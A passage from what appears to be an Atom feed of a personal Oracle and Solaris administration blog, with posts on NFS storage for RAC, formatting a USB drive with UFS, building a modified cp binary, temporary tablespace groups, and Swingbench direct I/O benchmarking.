solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configure the Solaris Servers for Oracle&lt;/h2&gt;

Now that we have shared storage set up, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the &lt;code&gt;/usr/bin&lt;/code&gt; directory by default, so the OUI will throw an error stating that it cannot find the &lt;code&gt;ssh&lt;/code&gt; or &lt;code&gt;scp&lt;/code&gt; binaries. My workaround was simply to create symbolic links to these binaries in the &lt;code&gt;/usr/local/bin&lt;/code&gt; directory.

&lt;pre&gt;
# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp
&lt;/pre&gt;
&lt;br&gt;
You should also create the oracle user and directories now before configuring kernel parameters.
&lt;br&gt;
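A minimal sketch of that step is below; the group names follow the common Oracle conventions and the user ID of 175 matches the &lt;code&gt;anon&lt;/code&gt; setting used on the filer earlier, so adjust both for your environment:

&lt;pre&gt;
# groupadd oinstall
# groupadd dba
# useradd -u 175 -g oinstall -G dba -m -d /export/home/oracle -s /usr/bin/bash oracle
# passwd oracle
&lt;/pre&gt;
&lt;br&gt;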

For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to &lt;a href=&quot;http://www.dizwell.com/prod/node/235&quot;&gt;this excellent installation guide&lt;/a&gt; for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

&lt;h2&gt;What's Left to Do&lt;/h2&gt;

From here on in, it's quite easy to follow Jeff Hunter's &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html&quot;&gt;article&lt;/a&gt;. Obviously, you won't be using ASM. The only differences between what to do now and what he has documented are the file locations. So you could follow along from &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi_2.html#14&quot;&gt;section 14&lt;/a&gt; and you should be able to get a 10gR2 RAC environment up and running. Obviously, there are some sections, such as setting up OCFS2 and ASMLib, that can be left out since we are installing on Solaris and not Linux.
</content>
 </entry>
 
 <entry>
   <title>Creating a UFS File System on an External Hard Drive with Solaris 10</title>
   <link href="http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10</id>
   <content type="html">&lt;p&gt;Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn&amp;#8217;t find much information on the web about how to perform this with Solaris (maybe I wasn&amp;#8217;t searching very well or something) so I thought I would post the procedure I followed here so I&amp;#8217;ll know how to do it again if I need to.&lt;/p&gt;

&lt;p&gt;After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the &lt;code&gt;/var/adm/messages&lt;/code&gt; file. With the hard drive I was using, I saw entries like the following:&lt;/p&gt;
&lt;pre&gt;
Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) 
operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 
(scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0
&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;dmesg&lt;/code&gt; command could also be used to see similar information. Also, we could use the &lt;code&gt;rmformat&lt;/code&gt; command (which lists removable media) to see this information in a much nicer format like so:&lt;/p&gt;
&lt;pre&gt;
# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#
&lt;/pre&gt;
&lt;p&gt;Now that we know the drive has been identified by Solaris (as &lt;code&gt;/dev/rdsk/c2t0d0p0&lt;/code&gt;) we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This is accomplished by passing the &lt;code&gt;-B&lt;/code&gt; flag to the &lt;code&gt;fdisk&lt;/code&gt; command, like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -B /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;Now we will print the disk table to standard out like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -W - /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;This will output the following information to the screen for the hard drive I am using:&lt;/p&gt;
&lt;pre&gt;
* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330
&lt;/pre&gt;
&lt;p&gt;We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sector (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 1024*1024 to yield MB.&lt;/p&gt;

&lt;p&gt;So in my case, this will work out as 286173.5009765625 MB.&lt;/p&gt;
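&lt;p&gt;As a quick sanity check, the same arithmetic (using integer division) can be done from the shell:&lt;/p&gt;
&lt;pre&gt;
# echo '512 * 586083330 / 1048576' | bc
286173
&lt;/pre&gt;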

&lt;p&gt;Now, we need to setup a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:&lt;/p&gt;
&lt;pre&gt;
slices: 0 = 2MB, 286170MB, &quot;wm&quot;, &quot;root&quot; :
      1 = 0, 1MB, &quot;wu&quot;, &quot;boot&quot; :
      2 = 0, 286172MB, &quot;wm&quot;, &quot;backup&quot;
&lt;/pre&gt;
&lt;p&gt;To create these slices on the disk, we run:&lt;/p&gt;
&lt;pre&gt;
# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C
&lt;/pre&gt;
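&lt;p&gt;At this point, &lt;code&gt;prtvtoc&lt;/code&gt; can be run against the backup slice to verify that the new slices were written as expected (the exact output will vary with the drive):&lt;/p&gt;
&lt;pre&gt;
# prtvtoc /dev/rdsk/c2t0d0s2
&lt;/pre&gt;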
&lt;p&gt;To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:&lt;/p&gt;
&lt;pre&gt;
# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#
&lt;/pre&gt;
&lt;p&gt;And now I&amp;#8217;m finished; I have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:&lt;/p&gt;
&lt;pre&gt;
# mount -F ufs /dev/dsk/c2t0d0s0 /u01
&lt;/pre&gt;</content>
 </entry>
 
 <entry>
   <title>Building a Modified cp Binary on Solaris 10</title>
   <link href="http://posulliv.github.com/2008/11/29/building-a-modified-cp-binary-on-solaris-10"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/building-a-modified-cp-binary-on-solaris-10</id>
   <content type="html">&lt;p&gt;I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson&amp;#8217;s blog. If you are looking for more background information on why I am performing this modification, have a look at &lt;a href='http://kevinclosson.wordpress.com/2007/02/23/standard-file-utilities-with-direct-io/'&gt;this post&lt;/a&gt; by Kevin Closson.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;GNU Core Utilities&lt;/span&gt;
&lt;p&gt;We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the &lt;a href='http://www.gnu.org/software/coreutils/'&gt;GNU Core Utilities&lt;/a&gt;. &lt;ul&gt;
	&lt;li&gt;&lt;a href='http://ftp.gnu.org/pub/gnu/coreutils/coreutils-5.2.1.tar.gz'&gt;Coreutils 5.2.1&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt; Download the software to an appropriate location on your system.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Modifying the Code&lt;/span&gt;
&lt;p&gt;Untar the code first on your system.&lt;/p&gt;
&lt;pre&gt;
# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar
&lt;/pre&gt;
&lt;p&gt;Proceed to the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory. Open the &lt;code&gt;copy.c&lt;/code&gt; file with an editor. The following are the differences between the modified &lt;code&gt;copy.c&lt;/code&gt; file and the original &lt;code&gt;copy.c&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;
# diff -b copy.c.orig copy.c
287c315
&amp;lt;   buf_size = ST_BLKSIZE (sb);
---
&amp;gt;   /* buf_size = ST_BLKSIZE (sb); */
288a317,319
&amp;gt;
&amp;gt;   buf_size = 8388608 ;
&amp;gt;
&lt;/pre&gt;&lt;span style='font-weight: bold;'&gt;Building the Binary&lt;/span&gt;
&lt;p&gt;To build the modified cp binary, navigate first to the &lt;code&gt;coreutils-5.2.1&lt;/code&gt; directory. Then enter the following (ensure that the &lt;code&gt;gcc&lt;/code&gt; binary is in your &lt;code&gt;PATH&lt;/code&gt; first; it is located at &lt;code&gt;/usr/sfw/bin/&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;
# ./configure
# /usr/ccs/bin/make
&lt;/pre&gt;
&lt;p&gt;We don&amp;#8217;t want to do &lt;code&gt;make install&lt;/code&gt; as is usual when building from source, since that would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory like so:&lt;/p&gt;
&lt;pre&gt;
# cp coreutils-5.2.1/src/cp /usr/bin/cp8m
&lt;/pre&gt;&lt;span style='font-weight: bold;'&gt;Results of using the Modified cp&lt;/span&gt;
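&lt;p&gt;A quick way to observe the effect locally (assuming a file system mounted with &lt;code&gt;forcedirectio&lt;/code&gt;, where the larger 8MB buffer matters most; the file name and target here are just placeholders) is to time both binaries copying the same large file:&lt;/p&gt;
&lt;pre&gt;
# timex /usr/bin/cp bigfile /u02/bigfile.1
# timex /usr/bin/cp8m bigfile /u02/bigfile.2
&lt;/pre&gt;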
&lt;p&gt;See &lt;a href='http://kevinclosson.wordpress.com/2007/03/15/copying-files-on-solaris-slow-or-fast-its-your-choice/'&gt;Kevin Closson's post&lt;/a&gt; on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>White Paper at Oracle OpenWorld</title>
   <link href="http://posulliv.github.com/2008/11/25/white-paper-at-oracle-openworld"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/white-paper-at-oracle-openworld</id>
   <content type="html">&lt;p&gt;A white paper that I was part of writing is being presented at Oracle OpenWorld this week. The paper is entitled &amp;#8216;High Availability Options for the Oracle Database&amp;#8217;. It is being presented by Dan Norris and I wrote the sections on Export/Import and data pump. The paper is available for download from the IT Convergence website &lt;a href='http://www.itconvergence.com/portal/page?_pageid=33,39115&amp;amp;_dad=portal&amp;amp;_schema=PORTAL'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Dan is kinda like my mentor here at &lt;a href='http://www.itconvergence.com/'&gt;IT Convergence&lt;/a&gt;. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.&lt;/p&gt;

&lt;p&gt;At the moment, I&amp;#8217;ve been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed &lt;a href='http://www.oracle.com/technology/pub/articles/hunter_rac10gr2.html'&gt;this excellent article&lt;/a&gt; by Jeffrey Hunter on setting up a RAC environment on a budget!&lt;/p&gt;

&lt;p&gt;OCFS2 would not play nice for me though, so I decided to use raw devices instead of OCFS2, which Mr. Hunter used in his article. Besides that, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).&lt;/p&gt;
 </entry>
 
 <entry>
   <title>Temporary Tablespace Groups</title>
   <link href="http://posulliv.github.com/2008/11/25/temporary-tablespace-groups"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/temporary-tablespace-groups</id>
   <content type="html">&lt;p&gt;Temporary tablespace groups are a new feature introduced in Oracle10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is created. Its members can only be temporary tablespaces.&lt;/p&gt;

&lt;p&gt;You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Group Creation&lt;/span&gt;
&lt;p&gt;You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_1
  2  TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'
  3  SIZE 100 M
  4  TABLESPACE GROUP temp_group_1;

Tablespace created.

SQL&amp;gt;
&lt;/pre&gt;
&lt;p&gt;If the group &lt;code&gt;temp_group_1&lt;/code&gt; did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_2
  2  TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'
  3  SIZE 100 M
  4  TABLESPACE GROUP '';

Tablespace created.

SQL&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Now we will alter this tablespace and add it to a group.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; ALTER TABLESPACE temp_test_2
  2  TABLESPACE GROUP temp_group_1;

Tablespace altered.

SQL&amp;gt;
&lt;/pre&gt;
&lt;p&gt;To de-assign a temporary tablespace from a group, we issue an &lt;code&gt;ALTER TABLESPACE&lt;/code&gt; command like so:&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; ALTER TABLESPACE temp_test_2
  2  TABLESPACE GROUP '';

Tablespace altered.

SQL&amp;gt;
&lt;/pre&gt;
&lt;span style='font-weight: bold;'&gt;Assign Users to Temporary Tablespace Groups&lt;/span&gt;
&lt;p&gt;In this example, we will assign the user &lt;code&gt;SCOTT&lt;/code&gt; to the temporary tablespace group &lt;code&gt;temp_group_1&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; ALTER USER scott
  2  TEMPORARY TABLESPACE temp_group_1;

User altered.

SQL&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Now when we query the &lt;code&gt;DBA_USERS&lt;/code&gt; view to see &lt;code&gt;SCOTT&lt;/code&gt;&amp;#8217;s default temporary tablespace, we will see that the group is his temporary tablespace now.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; SELECT username, temporary_tablespace
  2  FROM DBA_USERS
  3  WHERE username = 'SCOTT';

USERNAME TEMPORARY_TABLESPACE
-------- ------------------------------
SCOTT    TEMP_GROUP_1

SQL&amp;gt;
&lt;/pre&gt;
&lt;p&gt;To view a temporary tablespace group and its members, we can query the &lt;code&gt;DBA_TABLESPACE_GROUPS&lt;/code&gt; data dictionary view.&lt;/p&gt;
&lt;pre&gt;
SQL&amp;gt; SELECT * FROM DBA_TABLESPACE_GROUPS;

GROUP_NAME   TABLESPACE_NAME
------------ ------------------------------
TEMP_GROUP_1 TEMP_TEST_1
TEMP_GROUP_1 TEMP_TEST_2

SQL&amp;gt;
&lt;/pre&gt;
&lt;span style='font-weight: bold;'&gt;Advantages of Temporary Tablespace Groups&lt;/span&gt;&lt;ul&gt;
	&lt;li&gt;Allows multiple default temporary tablespaces&lt;/li&gt;
	&lt;li&gt;A single SQL operation can use multiple temporary tablespaces for sorting&lt;/li&gt;
	&lt;li&gt;Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.&lt;/li&gt;
	&lt;li&gt;If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.&lt;/li&gt;
&lt;/ul&gt;</content>
 </entry>
 
 <entry>
   <title>Playing with Swingbench</title>
   <link href="http://posulliv.github.com/2008/11/25/playing-with-swingbench"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/playing-with-swingbench</id>
   <content type="html">&lt;a href='http://www.dominicgiles.com/swingbench.html'&gt;Swingbench&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;A Note About the Environment Used for Testing&lt;/span&gt;
&lt;p&gt;Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.&lt;/p&gt;

&lt;p&gt;The datafiles for the database reside on an 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Enabling Direct I/O&lt;/span&gt;
&lt;p&gt;One quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (like most file systems) supports mount options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the &lt;code&gt;forcedirectio&lt;/code&gt; mount option like so: &lt;pre&gt;# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02&lt;/pre&gt; Another method is setting the &lt;code&gt;FILESYSTEMIO_OPTIONS=SETALL&lt;/code&gt; parameter within Oracle (available in 9i and later). As &lt;a href='http://blogs.sun.com/glennf/'&gt;Glenn Fawcett&lt;/a&gt; states in &lt;a href='http://blogs.sun.com/glennf/entry/where_do_you_cache_oracle'&gt;this excellent post&lt;/a&gt; on direct I/O, the &lt;code&gt;SETALL&lt;/code&gt; value passed to the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameter sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.&lt;/p&gt;
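&lt;p&gt;For example (a sketch; &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; is a static parameter, so this assumes an spfile is in use and the instance is restarted afterwards):&lt;/p&gt;
&lt;pre&gt;
SQL&gt; ALTER SYSTEM SET filesystemio_options = SETALL SCOPE = SPFILE;
&lt;/pre&gt;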
&lt;span style='font-weight: bold;'&gt;Swingbench Installation and Configuration&lt;/span&gt;
&lt;p&gt;Now that we&amp;#8217;ve got the preliminaries out of the way, it&amp;#8217;s time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from &lt;a href='http://www.dominicgiles.com/downloads.html'&gt;here&lt;/a&gt;. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine which you will be running Swingbench on.&lt;/p&gt;

&lt;p&gt;After unzipping the Swingbench zip file, you will need to edit the &lt;code&gt;swingbench.env&lt;/code&gt; file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment: &lt;ul&gt;
	&lt;li&gt;&lt;code&gt;ORACLE_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;JAVA_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;SWINGHOME&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt; If using the Oracle instant client software instead of a full RDBMS install on the machine you are running Swingbench on, the &lt;code&gt;CLASSPATH&lt;/code&gt; variable must also be modified from &lt;code&gt;$ORACLE_HOME/jdbc/lib/ojdbc14.jar&lt;/code&gt; to &lt;code&gt;$ORACLE_HOME/lib/ojdbc14.jar&lt;/code&gt;.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Installing Calling Circle&lt;/span&gt;
&lt;p&gt;The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.&lt;/p&gt;

&lt;p&gt;The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97% of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.&lt;/p&gt;

&lt;p&gt;The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the &lt;code&gt;ccwizard&lt;/code&gt; executable found in the &lt;code&gt;swingbench/bin&lt;/code&gt; directory. &lt;pre&gt;$ ./ccwizard&lt;/pre&gt; Click &lt;span&gt;Next&lt;/span&gt; on the welcome screen and you will then be presented with the screen shown below:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s1600-h/cc1.JPG'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s400/cc1.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 268px;' /&gt;&lt;/a&gt;
&lt;p&gt;Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click &lt;span&gt;Next&lt;/span&gt; when you have entered this information.&lt;/p&gt;

&lt;p&gt;The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click &lt;span&gt;Next&lt;/span&gt; to continue. This will bring you to the Schema Sizing window as shown below:&lt;/p&gt;
&lt;a href='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s1600-h/cc2.JPG'&gt;&lt;img src='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s320/cc2.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;
&lt;p&gt;Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click &lt;span&gt;Next&lt;/span&gt; to continue. Click &lt;span&gt;Finish&lt;/span&gt; on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below.&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s1600-h/cc3.JPG'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s320/cc3.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;Creating the Input Data for Calling Circle&lt;/span&gt;
&lt;p&gt;Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click &lt;span&gt;Next&lt;/span&gt; on the welcome screen. On the &amp;#8220;Select Task&amp;#8221; screen shown previously, this time select &amp;#8220;Generate Data for Benchmark Run&amp;#8221; and click &lt;span&gt;Next&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;In the &amp;#8220;Schema Details&amp;#8221; window which follows, enter the details of the schema which you created in the last section. Click &lt;span&gt;Next&lt;/span&gt; once all the necessary information has been entered. You will then be presented with the &amp;#8220;Benchmark Details&amp;#8221; screen as shown below:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s1600-h/cc4.JPG'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s320/cc4.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 217px;' /&gt;&lt;/a&gt;
&lt;p&gt;In this post, we will use 1000 transactions for each test as seen in the &amp;#8220;Number of Transactions&amp;#8221; dialog window above. Press &lt;span&gt;Next&lt;/span&gt; to continue and you will be presented with the final screen. Click &lt;span&gt;Finish&lt;/span&gt; to create the benchmark data.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Starting the Benchmark Test&lt;/span&gt;
&lt;p&gt;Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark, we can pass the sample Calling Circle configuration file (&lt;code&gt;ccconfig.xml&lt;/code&gt;) which is supplied with Swingbench as a runtime parameter like so: &lt;pre&gt;$ ./swingbench -c sample/ccconfig.xml&lt;/pre&gt; This will start up Swingbench with the sample configuration for the Calling Circle application; only a few settings need to be changed for us to use this configuration. All that needs to be changed is the connection settings for the host on which you have already set up the Calling Circle schema. Change the connection settings as necessary for your environment.&lt;/p&gt;

&lt;p&gt;The following screenshot shows the Calling Circle application running in Swingbench:&lt;/p&gt;
&lt;a href='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s1600-h/cc6.JPG'&gt;&lt;img src='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s320/cc6.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 203px;' /&gt;&lt;/a&gt;
&lt;p&gt;We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s1600-h/tab1.JPG'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s320/tab1.JPG' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 56px;' /&gt;&lt;/a&gt;
&lt;p&gt;This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Results &amp;amp; Conclusion&lt;/span&gt;
&lt;p&gt;The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following: &lt;ul&gt;
